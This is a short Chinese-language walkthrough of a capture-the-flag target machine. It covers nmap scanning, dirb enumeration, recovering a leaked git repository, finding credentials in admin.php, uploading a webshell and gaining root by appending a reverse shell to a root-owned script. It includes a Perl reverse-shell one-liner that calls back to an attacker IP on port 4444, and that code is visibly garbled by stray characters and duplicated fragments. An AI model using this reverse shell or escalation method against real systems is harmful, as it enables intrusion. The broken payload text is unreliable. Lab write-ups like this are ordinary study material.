扫描靶机:Nmap -sP 192.168.34.1/24
扫描开放端口:nmap -sV 192.168.34.154
扫描网站:dirb +网址
发现有上传漏洞,git泄露,admin应该是登录框
用工具将git回复
恢复了这几个
在admin.Php发现了账号和密码、
登录以后就可以上传文件了,先上传个shell(大马和 反向都可以)
反弹shell的perl码:
perl -e ‘use Socket;
i
=
"
192.168.34.189
"
;
i="192.168.34.189";
i="192.168.34.189";p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in(
p
,
i
n
e
t
a
t
o
n
(
p,inet_aton(
p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};’
得到webshell以后再home/eric下有个flag.Txt
但是还有一个flag在root下
在、home的eric下有个hackup.Sh属于root用户,root用户组,并且可以执行,
在hackup.sh的后面加个反向webshell,运行即可得到root的shell